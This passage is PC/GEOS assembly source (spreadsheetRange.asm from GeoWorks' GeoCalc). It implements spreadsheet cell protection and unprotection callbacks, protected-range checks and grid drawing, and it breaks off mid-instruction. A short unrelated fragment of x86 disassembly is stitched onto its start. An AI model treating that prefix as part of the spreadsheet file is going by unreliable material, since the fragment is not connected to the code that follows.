push esi 100091e9: 56 push esi 100091ea: 56 push esi 100091eb: 56 push esi 100091ec: 56 push esi 100091ed: c7 00 16 00 00 00 mov DWORD PTR [eax],0x16 100091f3: e8 7e e9 ff ff call 0x10007b76 100091f8: 83 c4 14 add esp,0x14 100091fb: 83 c8 ff or eax,0xffffffff 100091fe: 5e pop esi 100091ff: c3 ret 10009200: 83 25 a0 5c 01 10 00 and DWORD PTR ds:0x10015ca0,0x0 10009207: c3 ret 10009208: cc int3 10009209: cc int3 1000920a: cc int3 1000920b: cc int3 1000920c: cc int3 1000920d: cc int3 1000920e: cc int3 1000920f: cc int3
Library/Spreadsheet/Spreadsheet/spreadsheetRange.asm
steakknife/pcgeos
504
13091
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1991 -- All Rights Reserved PROJECT: PC GEOS MODULE: GeoCalc FILE: spreadsheetRange.asm AUTHOR: <NAME>, Mar 2, 1991 ROUTINES: Name Description ---- ----------- METHOD SpreadsheetProtectRange Protect the range of cells from being modified. METHOD SpreadsheetUnprotectRange Unprotect the range of cells so that they can be modified. EXT CheckProtectedCell Check if there are some protected cells in the input range. EXT RecalcVisibleRangeGState Recalculate which cells are visible after resize/scroll/etc. EXT RangeDrawGrid Draw range for specified range EXT CheckLargeGrid Check to see if the range we want to draw is too large to draw in one piece. EXT RangeDrawLargeGrid Draw a large grid by breaking it up into pieces. EXT CheckTranslate Check to see if we need to translate the range in order to draw the grid. EXT TranslateRangeInBounds Apply a translation to the gstate in order to draw the range. EXT RangeDraw Draw the specified range EXT CallRangeEnumSelected Call RangeEnum() on selected area with current draw flags EXT CallRangeEnum Call RangeEnum() after setting up params REVISION HISTORY: Name Date Description ---- ---- ----------- Gene 3/ 2/91 Initial revision DESCRIPTION: Range routines for the spreadsheet. $Id: spreadsheetRange.asm,v 1.1 97/04/07 11:13:39 newdeal Exp $ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ if _PROTECT_CELL EditCode segment resource COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SpreadsheetProtectRange %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Mark the range of the cells to be protected. CALLED BY: MSG_SPREADSHEET_PROTECT_RANGE PASS: *ds:si = SpreadsheetClass object ds:di = SpreadsheetClass instance data es = segment of SpreadsheetClass cl = SpreadsheetProctectionOptions ax = message # RETURN: nothing DESTROYED: ax SIDE EFFECTS: PSEUDO CODE/STRATEGY: * Find out the range of the cells that we have to protect. * Mark each of the cells in the range to be protected using callback using RangeEnum. REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/13/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ SpreadsheetProtectRange method dynamic SpreadsheetClass, MSG_SPREADSHEET_PROTECT_RANGE locals local CellLocals uses cx, dx, bp .enter Assert etype cl, SpreadsheetProtectionOptions ; ; First of all, change the cursor to be a busy cursor. And then ; find out the range of the cells that we have to protect. ; push si mov si, di ;ds:si = instance data call SpreadsheetMarkBusy cmp cl, SPO_SELECTED_CELLS ;selected range? jne allCells ;go to all Cell if not mov ax, ds:[si].SSI_selected.CR_start.CR_row mov cx, ds:[si].SSI_selected.CR_start.CR_column mov bx, ds:[si].SSI_selected.CR_end.CR_row mov dx, ds:[si].SSI_selected.CR_end.CR_column jmp gotRange allCells: mov di, SET_ENTIRE_SHEET call CallRangeExtentWholeSheet ;(ax,cx) (dx,bx) = ;range of spreadsheet xchg dx, bx ;(bx,dx) = (r,c) ; ; We don't lock a whole empty spreadsheet. Give error message here if ; the user is trying to do that. ; cmp ax, -1 ;empty spreadsheet je error gotRange: ; ; We have the range in (ax,cx) (bx,dx). Protect all cells in this ; range. ; mov locals.CL_params.REP_callback.segment, SEGMENT_CS mov locals.CL_params.REP_callback.offset, offset ProtectCellCB mov di, mask REF_ALL_CELLS call CallRangeEnum ;di trashed ; ; Make sure the UI Control is up-to-date ; pop si ;*ds:si = spreadsheet call SpreadsheetProtectionUpdateUI ;ax trashed ; ; Everything is done. Change the cursor back ; quit: call SpreadsheetMarkNotBusy .leave ret error: ; ; Display the error dialog. ; pop si mov si, offset CellProtectEmptyError call PasteNameNotifyDB jmp quit SpreadsheetProtectRange endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SpreadsheetCheckProtectedCells %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check to see if the given range of the cells is protected. CALLED BY: MSG_SPREADSHEET_CHECK_PROTECTED_CELLS PASS: *ds:si = SpreadsheetClass object ds:di = SpreadsheetClass instance data es = segment of SpreadsheetClass ss:bp = CellRange dx = size of CellRange (called remotely) ax = message # RETURN: carry = set -- protected cell exists clear -- no protected cell in the range DESTROYED: ax REVISION HISTORY: Name Date Description ---- ---- ----------- CL 7/ 5/95 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ SpreadsheetCheckProtectedCells method dynamic SpreadsheetClass, MSG_SPREADSHEET_CHECK_PROTECTED_CELLS uses cx, dx .enter mov ax, ss:[bp].CR_start.CR_row mov cx, ss:[bp].CR_start.CR_column mov bx, ss:[bp].CR_end.CR_row mov dx, ss:[bp].CR_end.CR_column mov si, di call CheckProtectedCell .leave ret SpreadsheetCheckProtectedCells endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ProtectCellCB %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Callback used by RangeEnum to mark the cell to be protected. CALLED BY: RangeEnum() through SpreadsheetProtectRange PASS: (ax, cx) = current cell (r, c) ss:bp = callback local variables (locals of type CallLocals) ss:bx = RangeEnumParams *es:di = cell data if any carry set if cell has data RETURN: carry set to abort enumeration es = seg. addr of cell (updated) dl = RangeEnumFlags DESTROYED: nothing SIDE EFFECTS: PSEUDO CODE/STRATEGY: * First of all, make sure the cell in current location is exist. If not, we have to create one. * Mark the cell to be protected and exit. REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/13/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ ProtectCellCB proc far locals local CellLocals uses ax, di, si, ds .enter inherit ; ; First of all, we have to find out if the current cell is allocated ; or not. If it is not, we have to allocate one. ; mov dl, 0 ;assume cell exists jc gotCell ;Branch if cell exists ; ; Cell doesn't exist. Create a new one. ; mov dl, mask REF_CELL_ALLOCATED movdw dssi, locals.CL_instanceData ;ds:si = spreadsheet ;instance data call SpreadsheetCreateEmptyCell SpreadsheetCellLock ;*es:di = cell data gotCell: ; ; Turn on the cell protection bit ; mov di, es:[di] ;es:di = cell data ornf es:[di].CC_recalcFlags, mask CRF_PROTECTION SpreadsheetCellDirty ; Dirty the cell data clc ; don't abort enum .leave ret ProtectCellCB endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SpreadsheetUnprotectRange %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Mark the range of cell to be unprotected, so the content of the cells can be changed again. CALLED BY: MSG_SPREADSHEET_UNPROTECT_RANGE PASS: *ds:si = SpreadsheetClass object ds:di = SpreadsheetClass instance data es = segment of SpreadsheetClass cl = SpreadsheetProctectionOptions ax = message # RETURN: nothing DESTROYED: ax SIDE EFFECTS: PSEUDO CODE/STRATEGY: * Find out the range of the cells that we have to unprotec. * Unprotect the range by using RangeEnum through callback. * Notify the edit bar to update itself because the cell may change from being protected to be unprotected REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/13/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ SpreadsheetUnprotectRange method dynamic SpreadsheetClass, MSG_SPREADSHEET_UNPROTECT_RANGE locals local CellLocals uses cx, dx, bp .enter Assert etype cl, SpreadsheetProtectionOptions ; ; First of all, change the cursor to be a busy cursor. And then ; find out the range of the cells that we have to unprotect. ; push si mov si, di ;ds:si = instance data call SpreadsheetMarkBusy cmp cl, SPO_SELECTED_CELLS ;selected range? jne allCells ;go to all Cell if not mov ax, ds:[si].SSI_selected.CR_start.CR_row mov cx, ds:[si].SSI_selected.CR_start.CR_column mov bx, ds:[si].SSI_selected.CR_end.CR_row mov dx, ds:[si].SSI_selected.CR_end.CR_column jmp gotRange allCells: mov di, SET_ENTIRE_SHEET call CallRangeExtentWholeSheet ;(ax,cx) (dx,bx) = ;range of spreadsheet xchg dx, bx ;(bx,dx) = (r,c) ; ; We don't lock a whole empty spreadsheet. Give error message here if ; the user is trying to do that. ; cmp ax, -1 ;empty spreadsheet je error gotRange: ; ; We have the range in (ax,cx) (bx,dx). Unrotect all cells in this ; range. ; mov locals.CL_params.REP_callback.segment, SEGMENT_CS mov locals.CL_params.REP_callback.offset, offset UnprotectCellCB mov di, mask REF_ALL_CELLS call CallRangeEnum ;di trashed ; ; Update the related controllers ; pop si ;*ds:si = spreadsheet call SpreadsheetProtectionUpdateUI ;ax trashed ; ; Everything is done. Change the cursor back ; quit: call SpreadsheetMarkNotBusy .leave ret error: ; ; Display the error dialog. ; pop si mov si, offset CellProtectEmptyError call PasteNameNotifyDB jmp quit SpreadsheetUnprotectRange endm COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% UnprotectCellCB %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Callback used by RangeEmnu to unmark the protected cells. CALLED BY: RangeEnum() through SpreadsheetUnprotectRange PASS: (ax, cx) = current clee (r,c) ss:bp = callback local variables (locals of type CallLocals) ss:bx = RangeEnumParams *es:di = cell data if any carry set if cell has data RETURN: carry set to abort enumeration es = seg. addr of cell (updated) dl = RangeEnumFlags DESTROYED: nothing SIDE EFFECTS: PSEUDO CODE/STRATEGY: * If there is no cell in the current location, then quit. * If the cell exists, clear the protection bit. BE CAREFULL: we use the unused bit in CC_recalcFlag to be the protection bit, so we don't have to allocate an extra byte just for cell protection. * We may need to delete the cell if the cell has no data REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/14/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ UnprotectCellCB proc far locals local CellLocals class SpreadsheetClass uses ax, di, si, ds .enter inherit far ; ; If cell at this location doesn't exist, just quit then. ; jnc quit EC < call ECCheckInstancePtr > clr dl ;assume default return mov di, es:[di] ;es:di = cell data ; ; Clear the protection bit from the cell data ; andnf es:[di].CC_recalcFlags, not (mask CRF_PROTECTION) SpreadsheetCellDirty ; ; We need to delete the cell if this cell has no empty, no note and ; no attri. ; cmp es:[di].CC_type, CT_EMPTY ;empty cell? jnz quit tst es:[di].CC_notes.segment ;notes? jnz quit tst es:[di].CC_dependencies.segment ;dependencies? jnz quit ; ; NOTE: this checks agains default column attributes, because if a ; cell is deleted, it will be recreated with those attributes ; push dx call ColumnGetDefaultAttrs ;dx = default col attrs cmp es:[di].CC_attrs, dx ;default attrs? pop dx jnz quit ; ; This cell will really be deleted -- unlock it first ; SpreadsheetCellUnlock call DeleteCell quit: clc .leave ret UnprotectCellCB endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SpreadsheetProtectionUpdateUI %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Update the controllers to reveal whether the cell(s) is/are protected. CALLED BY: SpreadsheetProtectRange, SpreadsheetUnprotectRange PASS: *ds:si = spreadsheet instance data ds:di = *ds:si es = seg address of SpreadsheetClass RETURN: nothing DESTROYED: ax SIDE EFFECTS: PSEUDO CODE/STRATEGY: REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/17/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ SpreadsheetProtectionUpdateUI proc near uses cx, dx, bp .enter ; ; Update the EditBar Controller ; mov ax, MSG_META_UI_FORCE_CONTROLLER_UPDATE mov cx, MANUFACTURER_ID_GEOWORKS mov dx, GWNT_SPREADSHEET_EDIT_BAR_CHANGE call ObjCallInstanceNoLock .leave ret SpreadsheetProtectionUpdateUI endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CheckProtectedCell %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check if there are some protected cells in the input range. CALLED BY: UTILITY for cell protection feature PASS: ds:si = Spreadsheet instance ax,cx = r, c of the top-left corner bx,dx = r, c of the bottom-right corner RETURN: carry set if the range contains protected cells; otherwise, carry is clear DESTROYED: nothing SIDE EFFECTS: PSEUDO CODE/STRATEGY: * Clear CL_data1 because we need it to tell us whether there exists any protected cell in the range. If it does, CL_data1 will be set to non-zero. * Use RangeEnum to check all the cells in the range * Set the apropriate carry flag based on CL_data1 REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/17/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CheckProtectedCell proc far locals local CellLocals uses di .enter EC< call ECCheckInstancePtr > ; ; Init some of the local variables. CL_data1 is used to tell whether ; there exists any protected cell(s) in the range. Orginally, it should ; be set to 0. ; clr locals.CL_data1 mov locals.CL_params.REP_callback.segment, SEGMENT_CS mov locals.CL_params.REP_callback.offset, offset CheckProtectedCellCB clr di ;use default flag call CallRangeEnum ;di trashed ; ; If CL_data1 is non-zero, that means there exists some protected ; in the range. We have to correct carry flag for the return. ; tst locals.CL_data1 jnz exit stc ; no protected cell exit: cmc .leave ret CheckProtectedCell endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CheckProtectedCellCB %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Callback used to check if the cell is protected. CALLED BY: RangeEnum() through CheckProtectCell() PASS: (ax, cx) = current cell (r, c) ss:bp = callback local variables (locals of type CallLocals) ss:bx = RangeEnumParams *es:di = cell data if any carry set if cell has data RETURN: carry set to abort enumeration es = seg. addr of cell (updated) dl = RangeEnumFlags locals.CL_data1 is non_zero if a protected cell is found. DESTROYED: nothing SIDE EFFECTS: PSEUDO CODE/STRATEGY: REVISION HISTORY: Name Date Description ---- ---- ----------- CL 10/17/94 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CheckProtectedCellCB proc far locals local CellLocals uses di .enter inherit EC < ERROR_NC -1 > ; ; Find out if this cell is protected or not. If it is, then set ; locals.CL_data1 to be non-zero, and abort the enum ; mov di, es:[di] ;es:di = cell data test es:[di].CC_recalcFlags, mask CRF_PROTECTION jz quit ;quit if not protected mov locals.CL_data1, 1 ;cell is protected stc ;abort enum since the protected ;cell is found quit: clr dl .leave ret CheckProtectedCellCB endp EditCode ends endif DrawCode segment resource COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% RecalcVisibleRangeGState %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Recalculate which cells are visible after resize/scroll/etc. CALLED BY: SpreadsheetDraw() PASS: ds:si - ptr to Spreadsheet instance di - handle of GState RETURN: none DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- eca 5/19/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ RecalcVisibleRangeGState proc near class SpreadsheetClass uses ax, bx, cx, dx locals local CellLocals .enter inherit EC < call ECCheckInstancePtr ;> call GetWinBounds32 lea bx, ss:locals.CL_docBounds.RD_right ;ss:bx <- ptr to PointDWord call Pos32ToVisCellFar ;(ax,cx) <- lower right cell mov ds:[si].SSI_visible.CR_end.CR_row, ax mov ds:[si].SSI_visible.CR_end.CR_column, cx .leave ret RecalcVisibleRangeGState endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% RangeDrawGrid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Draw range for specified range CALLED BY: RangeDraw() PASS: ds:si - ptr to Spreadsheet instance (ax,cx) (bx,dx) - range of cells to draw (r,c) ss:bp - inherited CellLocals CL_origin - origin for relative draw di - handle of GState RETURN: none DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: sets CL_params.REP_bounds REVISION HISTORY: Name Date Description ---- ---- ----------- eca 5/23/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ RangeDrawGrid proc near uses ax, bx, cx, dx class SpreadsheetClass locals local CellLocals EC < call ECCheckInstancePtr ;> .enter inherit EC < push bp ;> EC < mov bp, bx ;> EC < call ECCheckOrderedCoords ;> EC < pop bp ;> mov ss:locals.CL_params.REP_bounds.R_left, cx mov ss:locals.CL_params.REP_bounds.R_top, ax mov ss:locals.CL_params.REP_bounds.R_right, dx mov ss:locals.CL_params.REP_bounds.R_bottom, bx ; ; Set the line draw mask to 50% to cool grid lines ; push ax, dx mov al, SDM_50 ;al <- SysDrawMask call GrSetLineMask ; ; Set the line width to 0.0, so it doesn't scale ; clr ax, dx ;dx.ax <- 0.0 call GrSetLineWidth pop ax, dx ; ; Get the range bounds, relative to specified origin ; call GetRangeRelBounds32 ; ; We need to handle grids for large ranges specially. ; call CheckLargeGrid jnc notLarge call RangeDrawLargeGrid jmp quit notLarge: ; ; If the grid is off the legal drawing area we need to apply a ; translation to get it legal. ; call CheckTranslate pushf ;save "translated" flag (carry) jnc coordsOK call GrSaveState call TranslateRangeInBounds coordsOK: ; ; Draw a vertical line at the left edge of each column ; mov ax, ss:locals.CL_docBounds.RD_left.low mov bx, ss:locals.CL_docBounds.RD_top.low mov dx, ss:locals.CL_docBounds.RD_bottom.low mov cx, ss:locals.CL_params.REP_bounds.R_left columnLoop: call GrDrawVLine cmp cx, ss:locals.CL_params.REP_bounds.R_right ja doneColumns ;branch if done push dx call ColumnGetWidth ;dx <- column width add ax, dx ;ax <- next x position pop dx inc cx ;cx <- next column jmp columnLoop doneColumns: ; ; Draw a horizontal line at the top of each row ; mov cx, ss:locals.CL_docBounds.RD_right.low mov bx, ss:locals.CL_docBounds.RD_top.low mov ax, ss:locals.CL_params.REP_bounds.R_top rowLoop: push ax mov ax, ss:locals.CL_docBounds.RD_left.low call GrDrawHLine pop ax ;ax <- row # cmp ax, ss:locals.CL_params.REP_bounds.R_bottom ja doneRows ;branch if more rows call RowGetHeight ;dx <- column width add bx, dx ;bx <- next y position inc ax ;ax <- next row jmp rowLoop doneRows: popf ;restore "translated" flag jnc quit call GrRestoreState quit: ; ; Set the line thickness back to 1.0 for other operations ; mov dx, 1 clr ax ;dx.ax <- 1.0 call GrSetLineWidth .leave ret RangeDrawGrid endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CheckLargeGrid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check to see if the range we want to draw is too large to draw in one piece. CALLED BY: RangeDrawGrid PASS: ss:bp = Inheritable CellLocals RETURN: carry set if we need to break up the draw. DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 9/13/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CheckLargeGrid proc near uses ax, bx locals local CellLocals .enter inherit ; ; Check height. ; mov ax, locals.CL_docBounds.RD_bottom.low mov bx, locals.CL_docBounds.RD_bottom.high sub ax, locals.CL_docBounds.RD_top.low sbb bx, locals.CL_docBounds.RD_top.high tst bx jnz largeGrid cmp ax, LARGEST_POSITIVE_COORDINATE jae largeGrid ; ; Check width. ; mov ax, locals.CL_docBounds.RD_right.low mov bx, locals.CL_docBounds.RD_right.high sub ax, locals.CL_docBounds.RD_left.low sbb bx, locals.CL_docBounds.RD_left.high tst bx jnz largeGrid cmp ax, LARGEST_POSITIVE_COORDINATE jae largeGrid clc ; Signal: small grid quit: .leave ret largeGrid: stc ; Signal: large grid jmp quit CheckLargeGrid endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% RangeDrawLargeGrid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Draw a large grid by breaking it up into pieces. CALLED BY: RangeDrawGrid PASS: ss:bp = Inheritable CellLocals di = GState to use ds:si = Spreadsheet instance RETURN: nothing DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 9/13/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ RangeDrawLargeGrid proc near uses ax, bx, cx, dx locals local CellLocals .enter inherit EC < call ECCheckInstancePtr ;> ; ; Break the grid into four pieces. ; mov ax, ss:locals.CL_params.REP_bounds.R_top mov bx, ss:locals.CL_params.REP_bounds.R_bottom mov cx, ss:locals.CL_params.REP_bounds.R_left mov dx, ss:locals.CL_params.REP_bounds.R_right push dx ; Save old right push cx ; Save old left push bx ; Save old bottom ; ; Top-Left quadrant first... ; push dx ; Save right edge sub bx, ax shr bx, 1 add bx, ax ; bx <- new bottom sub dx, cx shr dx, 1 add dx, cx ; dx <- new right call RangeDrawGrid ; Draw top-left ; ; Set left edge to current right edge (+1) ; mov cx, dx ; cx <- old right inc cx pop dx ; Restore right edge ; ; Top-Right quadrant next... ; call RangeDrawGrid ; Draw top-right ; ; Lower-Left quadrant next... ; mov ax, bx ; ax <- new top inc ax pop bx ; Restore old bottom mov dx, cx ; dx <- new right edge dec dx pop cx ; Restore old left call RangeDrawGrid ; Draw lower-left ; ; Lower-Right quadrant next... ; mov cx, dx ; cx <- new left inc cx pop dx ; Restore old right call RangeDrawGrid ; Draw lower-right .leave ret RangeDrawLargeGrid endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CheckTranslate %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Check to see if we need to translate the range in order to draw the grid. CALLED BY: RangeDrawGrid PASS: ss:bp = Inheritable CellLocals RETURN: carry set if a translation is required DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 9/13/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CheckTranslate proc near uses ax locals local CellLocals .enter inherit mov ax, ss:locals.CL_docBounds.RD_bottom.high or ax, ss:locals.CL_docBounds.RD_right.high jnz translate mov ax, LARGEST_POSITIVE_COORDINATE cmp ss:locals.CL_docBounds.RD_bottom.low, ax jae translate cmp ss:locals.CL_docBounds.RD_right.low, ax jae translate clc ; Signal: no translation needed quit: .leave ret translate: stc ; Signal: needs translation jmp quit CheckTranslate endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% TranslateRangeInBounds %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Apply a translation to the gstate in order to draw the range. CALLED BY: RangeDrawGrid PASS: ss:bp = Inheritable CellLocals di = GState to transform RETURN: nothing DESTROYED: nothing PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- jcw 9/13/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ TranslateRangeInBounds proc near uses ax, bx, cx, dx locals local CellLocals .enter inherit mov dx, locals.CL_docBounds.RD_left.high mov cx, locals.CL_docBounds.RD_left.low mov bx, locals.CL_docBounds.RD_top.high mov ax, locals.CL_docBounds.RD_top.low call GrApplyTranslationDWord sub locals.CL_docBounds.RD_bottom.low, ax sbb locals.CL_docBounds.RD_bottom.high, bx sub locals.CL_docBounds.RD_right.low, cx sbb locals.CL_docBounds.RD_right.high, dx clr ax mov locals.CL_docBounds.RD_top.low, ax mov locals.CL_docBounds.RD_top.high, ax mov locals.CL_docBounds.RD_left.low, ax mov locals.CL_docBounds.RD_left.high, ax .leave ret TranslateRangeInBounds endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% RangeDraw %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Draw the specified range CALLED BY: SpreadsheetDrawRange(), SpreadsheetDraw() PASS: ds:si - instance data (SpreadsheetClass) (ax,cx) (bx,dx) - range of cells to draw (r,c) di - handle of GState ss:bp - inherited CellLocals CL_origin - relative draw origin CL_drawFlags - SpreadsheetDrawFlags RETURN: none DESTROYED: none PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- eca 3/ 2/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ RangeDraw proc far uses ax, bx, cx, dx, di class SpreadsheetClass locals local CellLocals .enter inherit EC < call ECCheckInstancePtr ;> EC < push bp ;> EC < mov bp, bx ;> EC < call ECCheckOrderedCoords ;> EC < pop bp ;> mov ss:locals.CL_gstate, di ;pass GState ; ; Draw the range of cells ; clr {byte}ss:locals.CL_data1 ;border flags clr di ;only cells w/data mov ss:locals.CL_params.REP_callback.segment, SEGMENT_CS mov ss:locals.CL_params.REP_callback.offset, offset CellDrawInt call CallRangeEnum ; ; Draw any cells in that are overlapped by other cells. ; Note that we only call back for rows that are marked ; as having overlap, but for all cells in that row. ; mov di, mask REF_MATCH_ROW_FLAGS or \ mask REF_ALL_CELLS mov ss:locals.CL_params.REP_matchFlags, mask SRF_HAS_OVERLAP mov ss:locals.CL_data2, -1 mov ss:locals.CL_data3, -1 mov ss:locals.CL_params.REP_callback.segment, SEGMENT_CS mov ss:locals.CL_params.REP_callback.offset, offset CellDrawOverlap call CallRangeEnum ; ; Draw the grid lines -- NOTE: we do this after the cells so that ; the gridlines consistently appear (otherwise they appear semi- ; randomly if a cell has a background color, at least in printing) ; but before cell borders so that those consistently appear. ; test ss:locals.CL_drawFlags, mask SDF_DRAW_GRID jz skipGridDraw mov di, ss:locals.CL_gstate call 